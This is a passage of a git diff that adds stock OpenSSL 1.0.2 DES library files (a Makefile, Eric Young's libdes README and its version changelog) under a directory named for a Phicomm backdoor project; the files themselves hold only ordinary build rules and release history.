+xcbc_enc.o: des_locl.h xcbc_enc.c
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/Makefile.save b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/Makefile.save
new file mode 100644
index 0000000..060c647
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/Makefile.save
@@ -0,0 +1,281 @@
+#
+# OpenSSL/crypto/des/Makefile
+#
+
+DIR=	des
+TOP=	../..
+CC=	cc
+CPP=	$(CC) -E
+INCLUDES=-I$(TOP) -I../../include
+CFLAG=-g
+MAKEFILE=	Makefile
+AR=		ar r
+RANLIB=		ranlib
+DES_ENC=	des_enc.o fcrypt_b.o
+
+CFLAGS= $(INCLUDES) $(CFLAG)
+ASFLAGS= $(INCLUDES) $(ASFLAG)
+AFLAGS= $(ASFLAGS)
+
+GENERAL=Makefile
+TEST=destest.c
+APPS=
+
+LIB=$(TOP)/libcrypto.a
+LIBSRC=	cbc_cksm.c cbc_enc.c  cfb64enc.c cfb_enc.c  \
+	ecb3_enc.c ecb_enc.c  enc_read.c enc_writ.c \
+	fcrypt.c ofb64enc.c ofb_enc.c  pcbc_enc.c \
+	qud_cksm.c rand_key.c rpc_enc.c  set_key.c  \
+	des_enc.c fcrypt_b.c \
+	xcbc_enc.c \
+	str2key.c  cfb64ede.c ofb64ede.c ede_cbcm_enc.c des_old.c des_old2.c \
+	read2pwd.c
+
+LIBOBJ= set_key.o  ecb_enc.o  cbc_enc.o \
+	ecb3_enc.o cfb64enc.o cfb64ede.o cfb_enc.o  ofb64ede.o \
+	enc_read.o enc_writ.o ofb64enc.o \
+	ofb_enc.o  str2key.o  pcbc_enc.o qud_cksm.o rand_key.o \
+	${DES_ENC} \
+	fcrypt.o xcbc_enc.o rpc_enc.o  cbc_cksm.o \
+	ede_cbcm_enc.o des_old.o des_old2.o read2pwd.o
+
+SRC= $(LIBSRC)
+
+EXHEADER= des.h des_old.h
+HEADER=	des_locl.h rpc_des.h spr.h des_ver.h $(EXHEADER)
+
+ALL=    $(GENERAL) $(SRC) $(HEADER)
+
+top:
+	(cd ../..; $(MAKE) DIRS=crypto SDIRS=$(DIR) sub_all)
+
+all:	lib
+
+lib:	$(LIBOBJ)
+	$(AR) $(LIB) $(LIBOBJ)
+	$(RANLIB) $(LIB) || echo Never mind.
+	@touch lib
+
+des: des.o cbc3_enc.o lib
+	$(CC) $(CFLAGS) -o des des.o cbc3_enc.o $(LIB)
+
+des_enc-sparc.S:	asm/des_enc.m4
+	m4 -B 8192 asm/des_enc.m4 > des_enc-sparc.S
+dest4-sparcv9.s:	asm/dest4-sparcv9.pl
+	$(PERL) asm/dest4-sparcv9.pl $(CFLAGS) > $@
+
+des-586.s:	asm/des-586.pl ../perlasm/x86asm.pl ../perlasm/cbc.pl
+	$(PERL) asm/des-586.pl $(PERLASM_SCHEME) $(CFLAGS) > $@
+crypt586.s:	asm/crypt586.pl ../perlasm/x86asm.pl ../perlasm/cbc.pl
+	$(PERL) asm/crypt586.pl $(PERLASM_SCHEME) $(CFLAGS) > $@
+
+files:
+	$(PERL) $(TOP)/util/files.pl Makefile >> $(TOP)/MINFO
+
+links:
+	@$(PERL) $(TOP)/util/mklink.pl ../../include/openssl $(EXHEADER)
+	@$(PERL) $(TOP)/util/mklink.pl ../../test $(TEST)
+	@$(PERL) $(TOP)/util/mklink.pl ../../apps $(APPS)
+
+# We need to use force because 'install' matches 'INSTALL' on case
+# insensitive systems
+FRC.install:
+install: FRC.install
+	@[ -n "$(INSTALLTOP)" ] # should be set by top Makefile...
+	@headerlist="$(EXHEADER)"; for i in $$headerlist ; \
+	do  \
+	(cp $$i $(INSTALL_PREFIX)$(INSTALLTOP)/include/openssl/$$i; \
+	chmod 644 $(INSTALL_PREFIX)$(INSTALLTOP)/include/openssl/$$i ); \
+	done;
+
+tags:
+	ctags $(SRC)
+
+tests:
+
+lint:
+	lint -DLINT $(INCLUDES) $(SRC)>fluff
+
+depend:
+	@[ -n "$(MAKEDEPEND)" ] # should be set by upper Makefile...
+	$(MAKEDEPEND) -- $(CFLAG) $(INCLUDES) $(DEPFLAG) -- $(PROGS) $(LIBSRC)
+
+dclean:
+	$(PERL) -pe 'if (/^# DO NOT DELETE THIS LINE/) {print; exit(0);}' $(MAKEFILE) >Makefile.new
+	mv -f Makefile.new $(MAKEFILE)
+
+clean:
+	rm -f *.s *.o *.obj des lib tags core .pure .nfs* *.old *.bak fluff
+
+# DO NOT DELETE THIS LINE -- make depend depends on it.
+
+cbc_cksm.o: ../../include/openssl/des.h ../../include/openssl/des_old.h
+cbc_cksm.o: ../../include/openssl/e_os2.h ../../include/openssl/opensslconf.h
+cbc_cksm.o: ../../include/openssl/ossl_typ.h ../../include/openssl/safestack.h
+cbc_cksm.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+cbc_cksm.o: ../../include/openssl/ui.h ../../include/openssl/ui_compat.h
+cbc_cksm.o: cbc_cksm.c des_locl.h
+cbc_enc.o: ../../include/openssl/des.h ../../include/openssl/des_old.h
+cbc_enc.o: ../../include/openssl/e_os2.h ../../include/openssl/opensslconf.h
+cbc_enc.o: ../../include/openssl/ossl_typ.h ../../include/openssl/safestack.h
+cbc_enc.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+cbc_enc.o: ../../include/openssl/ui.h ../../include/openssl/ui_compat.h
+cbc_enc.o: cbc_enc.c des_locl.h ncbc_enc.c
+cfb64ede.o: ../../e_os.h ../../include/openssl/des.h
+cfb64ede.o: ../../include/openssl/des_old.h ../../include/openssl/e_os2.h
+cfb64ede.o: ../../include/openssl/opensslconf.h
+cfb64ede.o: ../../include/openssl/ossl_typ.h ../../include/openssl/safestack.h
+cfb64ede.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+cfb64ede.o: ../../include/openssl/ui.h ../../include/openssl/ui_compat.h
+cfb64ede.o: cfb64ede.c des_locl.h
+cfb64enc.o: ../../include/openssl/des.h ../../include/openssl/des_old.h
+cfb64enc.o: ../../include/openssl/e_os2.h ../../include/openssl/opensslconf.h
+cfb64enc.o: ../../include/openssl/ossl_typ.h ../../include/openssl/safestack.h
+cfb64enc.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+cfb64enc.o: ../../include/openssl/ui.h ../../include/openssl/ui_compat.h
+cfb64enc.o: cfb64enc.c des_locl.h
+cfb_enc.o: ../../e_os.h ../../include/openssl/des.h
+cfb_enc.o: ../../include/openssl/des_old.h ../../include/openssl/e_os2.h
+cfb_enc.o: ../../include/openssl/opensslconf.h ../../include/openssl/ossl_typ.h
+cfb_enc.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+cfb_enc.o: ../../include/openssl/symhacks.h ../../include/openssl/ui.h
+cfb_enc.o: ../../include/openssl/ui_compat.h cfb_enc.c des_locl.h
+des_enc.o: ../../include/openssl/des.h ../../include/openssl/des_old.h
+des_enc.o: ../../include/openssl/e_os2.h ../../include/openssl/opensslconf.h
+des_enc.o: ../../include/openssl/ossl_typ.h ../../include/openssl/safestack.h
+des_enc.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+des_enc.o: ../../include/openssl/ui.h ../../include/openssl/ui_compat.h
+des_enc.o: des_enc.c des_locl.h ncbc_enc.c spr.h
+des_old.o: ../../include/openssl/des.h ../../include/openssl/des_old.h
+des_old.o: ../../include/openssl/e_os2.h ../../include/openssl/opensslconf.h
+des_old.o: ../../include/openssl/ossl_typ.h ../../include/openssl/rand.h
+des_old.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+des_old.o: ../../include/openssl/symhacks.h ../../include/openssl/ui.h
+des_old.o: ../../include/openssl/ui_compat.h des_old.c
+des_old2.o: ../../include/openssl/des.h ../../include/openssl/des_old.h
+des_old2.o: ../../include/openssl/e_os2.h ../../include/openssl/opensslconf.h
+des_old2.o: ../../include/openssl/ossl_typ.h ../../include/openssl/rand.h
+des_old2.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+des_old2.o: ../../include/openssl/symhacks.h ../../include/openssl/ui.h
+des_old2.o: ../../include/openssl/ui_compat.h des_old2.c
+ecb3_enc.o: ../../include/openssl/des.h ../../include/openssl/des_old.h
+ecb3_enc.o: ../../include/openssl/e_os2.h ../../include/openssl/opensslconf.h
+ecb3_enc.o: ../../include/openssl/ossl_typ.h ../../include/openssl/safestack.h
+ecb3_enc.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+ecb3_enc.o: ../../include/openssl/ui.h ../../include/openssl/ui_compat.h
+ecb3_enc.o: des_locl.h ecb3_enc.c
+ecb_enc.o: ../../include/openssl/bio.h ../../include/openssl/crypto.h
+ecb_enc.o: ../../include/openssl/des.h ../../include/openssl/des_old.h
+ecb_enc.o: ../../include/openssl/e_os2.h ../../include/openssl/opensslconf.h
+ecb_enc.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+ecb_enc.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+ecb_enc.o: ../../include/openssl/symhacks.h ../../include/openssl/ui.h
+ecb_enc.o: ../../include/openssl/ui_compat.h des_locl.h des_ver.h ecb_enc.c
+ede_cbcm_enc.o: ../../include/openssl/des.h ../../include/openssl/des_old.h
+ede_cbcm_enc.o: ../../include/openssl/e_os2.h
+ede_cbcm_enc.o: ../../include/openssl/opensslconf.h
+ede_cbcm_enc.o: ../../include/openssl/ossl_typ.h
+ede_cbcm_enc.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+ede_cbcm_enc.o: ../../include/openssl/symhacks.h ../../include/openssl/ui.h
+ede_cbcm_enc.o: ../../include/openssl/ui_compat.h des_locl.h ede_cbcm_enc.c
+enc_read.o: ../../e_os.h ../../include/openssl/bio.h
+enc_read.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+enc_read.o: ../../include/openssl/des.h ../../include/openssl/des_old.h
+enc_read.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+enc_read.o: ../../include/openssl/lhash.h ../../include/openssl/opensslconf.h
+enc_read.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+enc_read.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+enc_read.o: ../../include/openssl/symhacks.h ../../include/openssl/ui.h
+enc_read.o: ../../include/openssl/ui_compat.h ../cryptlib.h des_locl.h
+enc_read.o: enc_read.c
+enc_writ.o: ../../e_os.h ../../include/openssl/bio.h
+enc_writ.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+enc_writ.o: ../../include/openssl/des.h ../../include/openssl/des_old.h
+enc_writ.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+enc_writ.o: ../../include/openssl/lhash.h ../../include/openssl/opensslconf.h
+enc_writ.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+enc_writ.o: ../../include/openssl/rand.h ../../include/openssl/safestack.h
+enc_writ.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+enc_writ.o: ../../include/openssl/ui.h ../../include/openssl/ui_compat.h
+enc_writ.o: ../cryptlib.h des_locl.h enc_writ.c
+fcrypt.o: ../../include/openssl/des.h ../../include/openssl/des_old.h
+fcrypt.o: ../../include/openssl/e_os2.h ../../include/openssl/opensslconf.h
+fcrypt.o: ../../include/openssl/ossl_typ.h ../../include/openssl/safestack.h
+fcrypt.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+fcrypt.o: ../../include/openssl/ui.h ../../include/openssl/ui_compat.h
+fcrypt.o: des_locl.h fcrypt.c
+fcrypt_b.o: ../../include/openssl/des.h ../../include/openssl/des_old.h
+fcrypt_b.o: ../../include/openssl/e_os2.h ../../include/openssl/opensslconf.h
+fcrypt_b.o: ../../include/openssl/ossl_typ.h ../../include/openssl/safestack.h
+fcrypt_b.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+fcrypt_b.o: ../../include/openssl/ui.h ../../include/openssl/ui_compat.h
+fcrypt_b.o: des_locl.h fcrypt_b.c
+ofb64ede.o: ../../include/openssl/des.h ../../include/openssl/des_old.h
+ofb64ede.o: ../../include/openssl/e_os2.h ../../include/openssl/opensslconf.h
+ofb64ede.o: ../../include/openssl/ossl_typ.h ../../include/openssl/safestack.h
+ofb64ede.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+ofb64ede.o: ../../include/openssl/ui.h ../../include/openssl/ui_compat.h
+ofb64ede.o: des_locl.h ofb64ede.c
+ofb64enc.o: ../../include/openssl/des.h ../../include/openssl/des_old.h
+ofb64enc.o: ../../include/openssl/e_os2.h ../../include/openssl/opensslconf.h
+ofb64enc.o: ../../include/openssl/ossl_typ.h ../../include/openssl/safestack.h
+ofb64enc.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+ofb64enc.o: ../../include/openssl/ui.h ../../include/openssl/ui_compat.h
+ofb64enc.o: des_locl.h ofb64enc.c
+ofb_enc.o: ../../include/openssl/des.h ../../include/openssl/des_old.h
+ofb_enc.o: ../../include/openssl/e_os2.h ../../include/openssl/opensslconf.h
+ofb_enc.o: ../../include/openssl/ossl_typ.h ../../include/openssl/safestack.h
+ofb_enc.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+ofb_enc.o: ../../include/openssl/ui.h ../../include/openssl/ui_compat.h
+ofb_enc.o: des_locl.h ofb_enc.c
+pcbc_enc.o: ../../include/openssl/des.h ../../include/openssl/des_old.h
+pcbc_enc.o: ../../include/openssl/e_os2.h ../../include/openssl/opensslconf.h
+pcbc_enc.o: ../../include/openssl/ossl_typ.h ../../include/openssl/safestack.h
+pcbc_enc.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+pcbc_enc.o: ../../include/openssl/ui.h ../../include/openssl/ui_compat.h
+pcbc_enc.o: des_locl.h pcbc_enc.c
+qud_cksm.o: ../../include/openssl/des.h ../../include/openssl/des_old.h
+qud_cksm.o: ../../include/openssl/e_os2.h ../../include/openssl/opensslconf.h
+qud_cksm.o: ../../include/openssl/ossl_typ.h ../../include/openssl/safestack.h
+qud_cksm.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+qud_cksm.o: ../../include/openssl/ui.h ../../include/openssl/ui_compat.h
+qud_cksm.o: des_locl.h qud_cksm.c
+rand_key.o: ../../include/openssl/des.h ../../include/openssl/des_old.h
+rand_key.o: ../../include/openssl/e_os2.h ../../include/openssl/opensslconf.h
+rand_key.o: ../../include/openssl/ossl_typ.h ../../include/openssl/rand.h
+rand_key.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+rand_key.o: ../../include/openssl/symhacks.h ../../include/openssl/ui.h
+rand_key.o: ../../include/openssl/ui_compat.h rand_key.c
+read2pwd.o: ../../include/openssl/crypto.h ../../include/openssl/des.h
+read2pwd.o: ../../include/openssl/des_old.h ../../include/openssl/e_os2.h
+read2pwd.o: ../../include/openssl/opensslconf.h
+read2pwd.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+read2pwd.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+read2pwd.o: ../../include/openssl/symhacks.h ../../include/openssl/ui.h
+read2pwd.o: ../../include/openssl/ui_compat.h read2pwd.c
+rpc_enc.o: ../../include/openssl/des.h ../../include/openssl/des_old.h
+rpc_enc.o: ../../include/openssl/e_os2.h ../../include/openssl/opensslconf.h
+rpc_enc.o: ../../include/openssl/ossl_typ.h ../../include/openssl/safestack.h
+rpc_enc.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+rpc_enc.o: ../../include/openssl/ui.h ../../include/openssl/ui_compat.h
+rpc_enc.o: des_locl.h des_ver.h rpc_des.h rpc_enc.c
+set_key.o: ../../include/openssl/crypto.h ../../include/openssl/des.h
+set_key.o: ../../include/openssl/des_old.h ../../include/openssl/e_os2.h
+set_key.o: ../../include/openssl/opensslconf.h ../../include/openssl/opensslv.h
+set_key.o: ../../include/openssl/ossl_typ.h ../../include/openssl/safestack.h
+set_key.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+set_key.o: ../../include/openssl/ui.h ../../include/openssl/ui_compat.h
+set_key.o: des_locl.h set_key.c
+str2key.o: ../../include/openssl/crypto.h ../../include/openssl/des.h
+str2key.o: ../../include/openssl/des_old.h ../../include/openssl/e_os2.h
+str2key.o: ../../include/openssl/opensslconf.h ../../include/openssl/opensslv.h
+str2key.o: ../../include/openssl/ossl_typ.h ../../include/openssl/safestack.h
+str2key.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+str2key.o: ../../include/openssl/ui.h ../../include/openssl/ui_compat.h
+str2key.o: des_locl.h str2key.c
+xcbc_enc.o: ../../include/openssl/des.h ../../include/openssl/des_old.h
+xcbc_enc.o: ../../include/openssl/e_os2.h ../../include/openssl/opensslconf.h
+xcbc_enc.o: ../../include/openssl/ossl_typ.h ../../include/openssl/safestack.h
+xcbc_enc.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+xcbc_enc.o: ../../include/openssl/ui.h ../../include/openssl/ui_compat.h
+xcbc_enc.o: des_locl.h xcbc_enc.c
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/README b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/README
new file mode 100644
index 0000000..621a5ab
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/README
@@ -0,0 +1,54 @@
+
+		libdes, Version 4.01 10-Jan-97
+
+		Copyright (c) 1997, Eric Young
+			  All rights reserved.
+
+    This program is free software; you can redistribute it and/or modify
+    it under the terms specified in COPYRIGHT.
+    
+--
+The primary ftp site for this library is
+ftp://ftp.psy.uq.oz.au/pub/Crypto/DES/libdes-x.xx.tar.gz
+libdes is now also shipped with SSLeay.  Primary ftp site of
+ftp://ftp.psy.uq.oz.au/pub/Crypto/SSL/SSLeay-x.x.x.tar.gz
+
+The best way to build this library is to build it as part of SSLeay.
+
+This kit builds a DES encryption library and a DES encryption program.
+It supports ecb, cbc, ofb, cfb, triple ecb, triple cbc, triple ofb,
+triple cfb, desx, and MIT's pcbc encryption modes and also has a fast
+implementation of crypt(3).
+It contains support routines to read keys from a terminal,
+generate a random key, generate a key from an arbitrary length string,
+read/write encrypted data from/to a file descriptor.
+
+The implementation was written so as to conform with the manual entry
+for the des_crypt(3) library routines from MIT's project Athena.
+
+destest should be run after compilation to test the des routines.
+rpw should be run after compilation to test the read password routines.
+The des program is a replacement for the sun des command.  I believe it
+conforms to the sun version.
+
+The Imakefile is setup for use in the kerberos distribution.
+
+These routines are best compiled with gcc or any other good
+optimising compiler.
+Just turn you optimiser up to the highest settings and run destest
+after the build to make sure everything works.
+
+I believe these routines are close to the fastest and most portable DES
+routines that use small lookup tables (4.5k) that are publicly available.
+The fcrypt routine is faster than ufc's fcrypt (when compiling with
+gcc2 -O2) on the sparc 2 (1410 vs 1270) but is not so good on other machines
+(on a sun3/260 168 vs 336).  It is a function of CPU on chip cache size.
+[ 10-Jan-97 and a function of an incorrect speed testing program in
+  ufc which gave much better test figures that reality ].
+
+It is worth noting that on sparc and Alpha CPUs, performance of the DES
+library can vary by upto %10 due to the positioning of files after application
+linkage.
+
+Eric Young (eay@cryptsoft.com)
+
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/VERSION b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/VERSION
new file mode 100644
index 0000000..c7d0154
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/VERSION
@@ -0,0 +1,412 @@
+	Fixed the weak key values which were wrong :-(
+	Defining SIGACTION causes sigaction() to be used instead of signal().
+	SIGUSR1/SIGUSR2 are no longer mapped in the read tty stuff because it
+	can cause problems.  This should hopefully not affect normal
+	applications.
+
+Version 4.04
+	Fixed a few tests in destest.  Also added x86 assember for
+	des_ncbc_encrypt() which is the standard cbc mode function.
+	This makes a very very large performace difference.
+	Ariel Glenn ariel@columbia.edu reports that the terminal
+	'turn echo off' can return (errno == EINVAL) under solaris
+	when redirection is used.  So I now catch that as well as ENOTTY.
+
+
+Version 4.03
+	Left a static out of enc_write.c, which caused to buffer to be
+	continiously malloc()ed.  Does anyone use these functions?  I keep
+	on feeling like removing them since I only had these in there
+	for a version of kerberised login.  Anyway, this was pointed out
+	by Theo de Raadt <deraadt@cvs.openbsd.org>
+	The 'n' bit ofb code was wrong, it was not shifting the shift
+	register. It worked correctly for n == 64.  Thanks to
+	Gigi Ankeny <Gigi.Ankeny@Eng.Sun.COM> for pointing this one out.
+
+Version 4.02
+	I was doing 'if (memcmp(weak_keys[i],key,sizeof(key)) == 0)'
+	when checking for weak keys which is wrong :-(, pointed out by
+	Markus F.X.J. Oberhumer <markus.oberhumer@jk.uni-linz.ac.at>.
+
+Version 4.01
+	Even faster inner loop in the DES assembler for x86 and a modification
+	for IP/FP which is faster on x86.  Both of these changes are
+	from Svend Olaf Mikkelsen <svolaf@inet.uni-c.dk>.  His
+	changes make the assembler run %40 faster on a pentium.  This is just
+	a case of getting the instruction sequence 'just right'.
+	All credit to 'Svend' :-)
+	Quite a few special x86 'make' targets.
+	A libdes-l (lite) distribution.
+
+Version 4.00
+	After a bit of a pause, I'll up the major version number since this
+	is mostly a performace release.  I've added x86 assembler and
+	added more options for performance.  A %28 speedup for gcc 
+	on a pentium and the assembler is a %50 speedup.
+	MIPS CPU's, sparc and Alpha are the main CPU's with speedups.
+	Run des_opts to work out which options should be used.
+	DES_RISC1/DES_RISC2 use alternative inner loops which use
+	more registers but should give speedups on any CPU that does
+	dual issue (pentium).  DES_UNROLL unrolls the inner loop,
+	which costs in code size.
+
+Version 3.26
+	I've finally removed one of the shifts in D_ENCRYPT.  This
+	meant I've changed the des_SPtrans table (spr.h), the set_key()
+	function and some things in des_enc.c.  This has definitly
+	made things faster :-).  I've known about this one for some
+	time but I've been too lazy to follow it up :-).
+	Noticed that in the D_ENCRYPT() macro, we can just do L^=(..)^(..)^..
+	instead of L^=((..)|(..)|(..)..  This should save a register at
+	least.
+	Assember for x86.  The file to replace is des_enc.c, which is replaced
+	by one of the assembler files found in asm.  Look at des/asm/readme
+	for more info.
+
+	/* Modification to fcrypt so it can be compiled to support
+	HPUX 10.x's long password format, define -DLONGCRYPT to use this.
+	Thanks to Jens Kupferschmidt <bt1cu@hpboot.rz.uni-leipzig.de>. */
+
+	SIGWINCH case put in des_read_passwd() so the function does not
+	'exit' if this function is recieved.
+
+Version 3.25 17/07/96
+	Modified read_pwd.c so that stdin can be read if not a tty.
+	Thanks to Jeff Barber <jeffb@issl.atl.hp.com> for the patches.
+	des_init_random_number_generator() shortened due to VMS linker
+	limits.
+	Added RSA's DESX cbc mode.  It is a form of cbc encryption, with 2
+	8 byte quantites xored before and after encryption.
+	des_xcbc_encryption() - the name is funny to preserve the des_
+	prefix on all functions.
+
+Version 3.24 20/04/96
+	The DES_PTR macro option checked and used by SSLeay configuration
+
+Version 3.23 11/04/96
+	Added DES_LONG.  If defined to 'unsigned int' on the DEC Alpha,
+	it gives a %20 speedup :-)
+	Fixed the problem with des.pl under perl5.  The patches were
+	sent by Ed Kubaitis (ejk@uiuc.edu).
+	if fcrypt.c, changed values to handle illegal salt values the way
+	normal crypt() implementations do.  Some programs apparently use
+	them :-(. The patch was sent by Bjorn Gronvall <bg@sics.se>
+
+Version 3.22 29/11/95
+	Bug in des(1), an error with the uuencoding stuff when the
+	'data' is small, thanks to Geoff Keating <keagchon@mehta.anu.edu.au>
+	for the patch.
+
+Version 3.21 22/11/95
+	After some emailing back and forth with 
+	Colin Plumb <colin@nyx10.cs.du.edu>, I've tweaked a few things
+	and in a future version I will probably put in some of the
+	optimisation he suggested for use with the DES_USE_PTR option.
+	Extra routines from Mark Murray <mark@grondar.za> for use in
+	freeBSD.  They mostly involve random number generation for use
+	with kerberos.  They involve evil machine specific system calls
+	etc so I would normally suggest pushing this stuff into the
+	application and/or using RAND_seed()/RAND_bytes() if you are
+	using this DES library as part of SSLeay.
+	Redone the read_pw() function so that it is cleaner and
+	supports termios, thanks to Sameer Parekh <sameer@c2.org>
+	for the initial patches for this.
+	Renamed 3ecb_encrypt() to ecb3_encrypt().  This has been
+	 done just to make things more consistent.
+	I have also now added triple DES versions of cfb and ofb.
+
+Version 3.20
+	Damn, Damn, Damn, as pointed out by Mike_Spreitzer.PARC@xerox.com,
+	my des_random_seed() function was only copying 4 bytes of the
+	passed seed into the init structure.  It is now fixed to copy 8.
+	My own suggestion is to used something like MD5 :-)
+
+Version 3.19 
+	While looking at my code one day, I though, why do I keep on
+	calling des_encrypt(in,out,ks,enc) when every function that
+	calls it has in and out the same.  So I dropped the 'out'
+	parameter, people should not be using this function.
+
+Version 3.18 30/08/95
+	Fixed a few bit with the distribution and the filenames.
+	3.17 had been munged via a move to DOS and back again.
+	NO CODE CHANGES
+
+Version 3.17 14/07/95
+	Fixed ede3 cbc which I had broken in 3.16.  I have also
+	removed some unneeded variables in 7-8 of the routines.
+
+Version 3.16 26/06/95
+	Added des_encrypt2() which does not use IP/FP, used by triple
+	des routines.  Tweaked things a bit elsewhere. %13 speedup on
+	sparc and %6 on a R4400 for ede3 cbc mode.
+
+Version 3.15 06/06/95
+	Added des_ncbc_encrypt(), it is des_cbc mode except that it is
+	'normal' and copies the new iv value back over the top of the
+	passed parameter.
+	CHANGED des_ede3_cbc_encrypt() so that it too now overwrites
+	the iv.  THIS WILL BREAK EXISTING CODE, but since this function
+	only new, I feel I can change it, not so with des_cbc_encrypt :-(.
+	I need to update the documentation.
+
+Version 3.14 31/05/95
+	New release upon the world, as part of my SSL implementation.
+	New copyright and usage stuff.  Basically free for all to use
+	as long as you say it came from me :-)
+
+Version 3.13 31/05/95
+	A fix in speed.c, if HZ is not defined, I set it to 100.0
+	which is reasonable for most unixes except SunOS 4.x.
+	I now have a #ifdef sun but timing for SunOS 4.x looked very
+	good :-(.  At my last job where I used SunOS 4.x, it was
+	defined to be 60.0 (look at the old INSTALL documentation), at
+	the last release had it changed to 100.0 since I now work with
+	Solaris2 and SVR4 boxes.
+	Thanks to  Rory Chisholm <rchishol@math.ethz.ch> for pointing this
+	one out.
+
+Version 3.12 08/05/95
+	As pointed out by The Crypt Keeper <tck@bend.UCSD.EDU>,
+	my D_ENCRYPT macro in crypt() had an un-necessary variable.
+	It has been removed.
+
+Version 3.11 03/05/95
+	Added des_ede3_cbc_encrypt() which is cbc mode des with 3 keys
+	and one iv.  It is a standard and I needed it for my SSL code.
+	It makes more sense to use this for triple DES than
+	3cbc_encrypt().  I have also added (or should I say tested :-)
+	cfb64_encrypt() which is cfb64 but it will encrypt a partial
+	number of bytes - 3 bytes in 3 bytes out.  Again this is for
+	my SSL library, as a form of encryption to use with SSL
+	telnet.
+
+Version 3.10 22/03/95
+	Fixed a bug in 3cbc_encrypt() :-(.  When making repeated calls
+	to cbc3_encrypt, the 2 iv values that were being returned to
+	be used in the next call were reversed :-(.
+	Many thanks to Bill Wade <wade@Stoner.COM> for pointing out
+	this error.
+
+Version 3.09 01/02/95
+	Fixed des_random_key to far more random, it was rather feeble
+	with regards to picking the initial seed.  The problem was
+	pointed out by Olaf Kirch <okir@monad.swb.de>.
+
+Version 3.08 14/12/94
+	Added Makefile.PL so libdes can be built into perl5.
+	Changed des_locl.h so RAND is always defined.
+
+Version 3.07 05/12/94
+	Added GNUmake and stuff so the library can be build with
+	glibc.
+
+Version 3.06 30/08/94
+	Added rpc_enc.c which contains _des_crypt.  This is for use in
+	secure_rpc v 4.0
+	Finally fixed the cfb_enc problems.
+	Fixed a few parameter parsing bugs in des (-3 and -b), thanks
+	to Rob McMillan <R.McMillan@its.gu.edu.au>
+
+Version 3.05 21/04/94
+	for unsigned long l; gcc does not produce ((l>>34) == 0)
+	This causes bugs in cfb_enc.
+	Thanks to Hadmut Danisch <danisch@ira.uka.de>
+
+Version 3.04 20/04/94
+	Added a version number to des.c and libdes.a
+
+Version 3.03 12/01/94
+	Fixed a bug in non zero iv in 3cbc_enc.
+
+Version 3.02 29/10/93
+	I now work in a place where there are 6+ architectures and 14+
+	OS versions :-).
+	Fixed TERMIO definition so the most sys V boxes will work :-)
+
+Release upon comp.sources.misc
+Version 3.01 08/10/93
+	Added des_3cbc_encrypt()
+
+Version 3.00 07/10/93
+	Fixed up documentation.
+	quad_cksum definitely compatible with MIT's now.
+
+Version 2.30 24/08/93
+	Triple DES now defaults to triple cbc but can do triple ecb
+	 with the -b flag.
+	Fixed some MSDOS uuen/uudecoding problems, thanks to
+	Added prototypes.
+	
+Version 2.22 29/06/93
+	Fixed a bug in des_is_weak_key() which stopped it working :-(
+	thanks to engineering@MorningStar.Com.
+
+Version 2.21 03/06/93
+	des(1) with no arguments gives quite a bit of help.
+	Added -c (generate ckecksum) flag to des(1).
+	Added -3 (triple DES) flag to des(1).
+	Added cfb and ofb routines to the library.
+
+Version 2.20 11/03/93
+	Added -u (uuencode) flag to des(1).
+	I have been playing with byte order in quad_cksum to make it
+	 compatible with MIT's version.  All I can say is avid this
+	 function if possible since MIT's output is endian dependent.
+
+Version 2.12 14/10/92
+	Added MSDOS specific macro in ecb_encrypt which gives a %70
+	 speed up when the code is compiled with turbo C.
+
+Version 2.11 12/10/92
+	Speedup in set_key (recoding of PC-1)
+	 I now do it in 47 simple operations, down from 60.
+	 Thanks to John Fletcher (john_fletcher@lccmail.ocf.llnl.gov)
+	 for motivating me to look for a faster system :-)
+	 The speedup is probably less that 1% but it is still 13
+	 instructions less :-).
+
+Version 2.10 06/10/92
+	The code now works on the 64bit ETA10 and CRAY without modifications or
